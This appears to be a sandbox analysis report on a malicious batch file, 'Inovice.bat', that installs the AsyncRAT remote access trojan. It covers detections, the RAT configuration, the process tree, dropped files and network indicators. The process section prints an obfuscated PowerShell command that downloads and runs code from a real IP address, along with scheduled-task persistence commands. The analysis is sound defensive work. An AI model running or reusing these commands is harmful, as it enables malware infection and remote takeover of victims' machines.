File name: Inovice.bat

Full analysis: https://app.any.run/tasks/3bd6edf1-e76e-40d5-bfaa-0ef4a844e6e8
Verdict: Malicious activity
Threats:

AsyncRAT is a remote access trojan (RAT) that can monitor and remotely control infected systems. It was published on GitHub as legitimate open-source remote administration software, but attackers adopt it for its many powerful malicious functions.

Analysis date: December 05, 2022, 19:47:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: opendir, asyncrat, trojan, rat
Indicators:
MIME: text/plain
File info: UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5: BF021F142FA831D9BE71B25476DAF0F6
SHA1: F2F5735ACD04E2228AC09586CAD425B82409F253
SHA256: 8DBAC79CA4B263BE822F6DDAE805B854753E1118767353654CC26DAB34F44C49
SSDEEP: 192:lzJ1cqL+cWrc2DaODe779zgWg94YWNjaOfQ:pJ1cqL+cWrc2DFe77pgWg94YWNje

ANY.RUN is an interactive service that provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as is. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3428)
      • schtasks.exe (PID: 2624)
      • schtasks.exe (PID: 2188)
    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 1260)
    • ASYNCRAT detected by memory dumps

      • powershell.exe (PID: 1260)
      • aspnet_compiler.exe (PID: 2116)
    • ASYNCRAT was detected

      • aspnet_compiler.exe (PID: 2116)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3248)
    • Application launched itself

      • cmd.exe (PID: 3248)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3712)
      • WScript.exe (PID: 3992)
      • WScript.exe (PID: 2692)
    • Executes scripts

      • powershell.exe (PID: 1112)
    • Executes via Task Scheduler

      • WScript.exe (PID: 2692)
    • Reads the Internet Settings

      • aspnet_compiler.exe (PID: 2116)
    • Reads settings of System Certificates

      • aspnet_compiler.exe (PID: 2116)
  • INFO

    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 1112)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 1260)
    • Creates a file in a temporary directory

      • powershell.exe (PID: 1112)
      • powershell.exe (PID: 3112)
      • powershell.exe (PID: 1260)
    • Checks supported languages

      • aspnet_compiler.exe (PID: 2116)
    • Reads the computer name

      • aspnet_compiler.exe (PID: 2116)
    • Reads Environment values

      • aspnet_compiler.exe (PID: 2116)

AsyncRat configuration

Process: (PID 2116) aspnet_compiler.exe
C2 (1): aboreda.linkpc.net
Ports (1): 6666
Version: | Edit 3LOSH RAT
Autorun: false
Mutex: AsyncMutex_fghd
Certificate: MIIE8jCCAtqgAwIBAgIQANbiVxLaNmSYyv61DmCgDzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwNDE0MjMyNTI3WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJZsIsXBl2b0q/B3i8jEIs3V21H0zFCak2edQRldp7T71gCRF3gDcDdUQ2gKHnqhJYT+n6ivj/5B...
Server_Signature: GN/8+ivB5wP1EgjZz+u1FhO8aO9NgzdVSIcOWchN4HViQsmv9aHf+cFGGYig0z/6sh99BuCvSo8a4DxHwzbuD8XTbnyWbMFpqRIBWVDUC2byxpV9WOSo/wIDfM1eH4aC7w2O2lw/+Vr46R+v9Q39gocEdKlWmM67S2+FMW/y50Q/CTXP/JRNcPLgJpEP9CwQ6ykMP/idAxxIyW279D0IqdLKbHCEmKQ8eNdQyDKv/0JJumBazodAsL4i+P0wdwFtHV3+JhpN2MmDzi67uD/WCEAqmZAvquDZAnaRZK2LrqCS...
AntiVM: false
PasteBin: true
bdos: false
Botnet: BTC Address
Aes_Key: 561bcf00f570f137c8049f75c5148cefbf0cac7746be869c32dad39fe5aefa7c
Salt: bfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
Install_Folder: %AppData%
Total processes: 46
Monitored processes: 11
Malicious processes: 3
Suspicious processes: 2

Behavior graph

Process nodes shown in the graph, in order: start, cmd.exe, cmd.exe, powershell.exe, wscript.exe, powershell.exe, schtasks.exe, schtasks.exe, wscript.exe, #ASYNCRAT powershell.exe, #ASYNCRAT aspnet_compiler.exe, schtasks.exe

Process information

PID: 3248
CMD: C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Inovice.bat" "
Path: C:\Windows\system32\cmd.exe
Parent process: Explorer.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID: 3712
CMD: CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019='IEX(NEW-OBJECT NET.W';$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5='EBCLIENT).DOWNLO';[BYTE[]];$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032='2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2(''http://198.20.177.229:444/x.png'')'.REPLACE('2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2','ADSTRING');[BYTE[]];IEX($2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019+$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5+$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032)
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID: 1112
CMD: POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019='IEX(NEW-OBJECT NET.W';$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5='EBCLIENT).DOWNLO';[BYTE[]];$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032='2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2(''http://198.20.177.229:444/x.png'')'.REPLACE('2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2','ADSTRING');[BYTE[]];IEX($2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019+$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5+$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032)
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
PID: 3992
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\Logs\install.vbs"
Path: C:\Windows\System32\WScript.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385
PID: 3112
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\Logs\install.ps1'))
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
PID: 3428
CMD: "C:\Windows\system32\schtasks.exe" /create /tn det /sc minute /st 00:10 /tr C:\Users\admin\AppData\Roaming\Logs\Loader.vbs
Path: C:\Windows\system32\schtasks.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Manages scheduled tasks
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID: 2624
CMD: "C:\Windows\system32\schtasks.exe" /create /tn administartor /SC minute /MO 3 /tr C:\Users\admin\AppData\Roaming\Logs\Loader.vbs
Path: C:\Windows\system32\schtasks.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Manages scheduled tasks
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID: 2692
CMD: C:\Windows\System32\WScript.exe "C:\Users\admin\AppData\Roaming\Logs\Loader.vbs"
Path: C:\Windows\System32\WScript.exe
Parent process: taskeng.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385
PID: 1260
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\Logs\Report.ps1'))
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
PID: 2116
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: aspnet_compiler.exe
Version: 4.0.30319.34209 built by: FX452RTMGDR
Total events: 7 601
Read events: 7 551
Write events: 50
Delete events: 0

Modification events

Process: (PID 1112) powershell.exe; Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32; Operation: write; Name: EnableFileTracing; Value: 0
Process: (PID 1112) powershell.exe; Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32; Operation: write; Name: EnableConsoleTracing; Value: 0
Process: (PID 1112) powershell.exe; Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32; Operation: write; Name: FileTracingMask; Value:
Process: (PID 1112) powershell.exe; Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32; Operation: write; Name: ConsoleTracingMask; Value:
Process: (PID 1112) powershell.exe; Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32; Operation: write; Name: MaxFileSize; Value: 1048576
Process: (PID 1112) powershell.exe; Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32; Operation: write; Name: FileDirectory; Value: %windir%\tracing
Process: (PID 1112) powershell.exe; Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS; Operation: write; Name: EnableFileTracing; Value: 0
Process: (PID 1112) powershell.exe; Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS; Operation: write; Name: EnableConsoleTracing; Value: 0
Process: (PID 1112) powershell.exe; Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS; Operation: write; Name: FileTracingMask; Value:
Process: (PID 1112) powershell.exe; Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS; Operation: write; Name: ConsoleTracingMask; Value:
Executable files: 0
Suspicious files: 9
Text files: 4
Unknown types: 2

Dropped files

PID 1112, powershell.exe: C:\Users\admin\AppData\Roaming\Logs\Report.ps1 (type: text)
  MD5: AFEB32EFA5CDAAEE1360F00886C19B10
  SHA256: 8C46090FB44AF131902A35351D71A5026EEEF32B3CAF880A0C7398BE5D3AD85F
PID 1112, powershell.exe: C:\Users\admin\AppData\Roaming\Logs\Loader.vbs (type: text)
  MD5: 7A1F08FD27F797B5A5CC2D79F8F6BBA7
  SHA256: 922DC773ABDFD0812B0E1ADCAABF9DEA2E5F0264573266CF0B024FEB984C632E
PID 1112, powershell.exe: C:\Users\admin\AppData\Roaming\Logs\install.vbs (type: text)
  MD5: E35D96B22A7A748D8A85089EA37B003E
  SHA256: 06B9130D3E031C4729AD96332ED15189D5391B88F81C5BBB0F3A94AC4A05185A
PID 1112, powershell.exe: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (type: dbf)
  MD5: 446DD1CF97EABA21CF14D03AEBC79F27
  SHA256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
PID 2116, aspnet_compiler.exe: C:\Users\admin\AppData\Local\Temp\Cab15F1.tmp (type: compressed)
  MD5: FC4666CBCA561E864E7FDF883A9E6661
  SHA256: 10F3DEB6C452D749A7451B5D065F4C0449737E5EE8A44F4D15844B503141E65B
PID 2116, aspnet_compiler.exe: C:\Users\admin\AppData\Local\Temp\Tar15F2.tmp (type: cat)
  MD5: 73B4B714B42FC9A6AAEFD0AE59ADB009
  SHA256: C0CF8CC04C34B5B80A2D86AD0EAFB2DD71436F070C86B0321FBA0201879625FD
PID 1112, powershell.exe: C:\Users\admin\AppData\Local\Temp\5ls2h5gk.p1g.ps1 (type: binary)
  MD5: C4CA4238A0B923820DCC509A6F75849B
  SHA256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
PID 2116, aspnet_compiler.exe: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 (type: binary)
  MD5: 3EC598FDA7DA5A6080350EADC34CA03F
  SHA256: 9739D6314CAEA5B5779C6D80E00F205CD57594DC702DAA458528BF92D1E1C1DB
PID 1260, powershell.exe: C:\Users\admin\AppData\Local\Temp\51v2aea5.1nk.ps1 (type: binary)
  MD5: C4CA4238A0B923820DCC509A6F75849B
  SHA256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
PID 1260, powershell.exe: C:\Users\admin\AppData\Local\Temp\4cgvd2ku.ga3.psm1 (type: binary)
  MD5: C4CA4238A0B923820DCC509A6F75849B
  SHA256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
HTTP(S) requests: 2
TCP/UDP connections: 3
DNS requests: 2
Threats: 0

HTTP requests

PID 1112, powershell.exe: GET, HTTP 200, IP 198.20.177.229:444, URL http://198.20.177.229:444/x.png, CN: US, Type: text, Size: 243 Kb, Reputation: malicious
PID 2116, aspnet_compiler.exe: GET, HTTP 200, IP 95.140.236.128:80, URL http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9f7f011d88e2d5c1, CN: GB, Type: compressed, Size: 61.4 Kb, Reputation: whitelisted

Connections

PID 2116, aspnet_compiler.exe: IP 198.20.177.229:6666, Domain aboreda.linkpc.net, ASN SERVER-MANIA, CN: US, Reputation: malicious
PID 2116, aspnet_compiler.exe: IP 95.140.236.128:80, Domain ctldl.windowsupdate.com, ASN LLNW, CN: US, Reputation: malicious
PID 1112, powershell.exe: IP 198.20.177.229:444, Domain aboreda.linkpc.net, ASN SERVER-MANIA, CN: US, Reputation: malicious

DNS requests

aboreda.linkpc.net: 198.20.177.229 (Reputation: malicious)
ctldl.windowsupdate.com: 95.140.236.128, 178.79.242.128 (Reputation: whitelisted)

Threats

PID 1112, powershell.exe: Misc activity; ET INFO [TW] Likely Hex Executable String
PID 1112, powershell.exe: Executable code was detected; ET SHELLCODE Common 0a0a0a0a Heap Spray String
Potentially Bad Traffic; ET INFO Observed DNS Query to DynDNS Domain (linkpc .net)
PID 2116, aspnet_compiler.exe: A Network Trojan was detected; ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)
PID 2116, aspnet_compiler.exe: A Network Trojan was detected; ET TROJAN Generic AsyncRAT Style SSL Cert
1 ETPRO signature is available in the full report
No debug info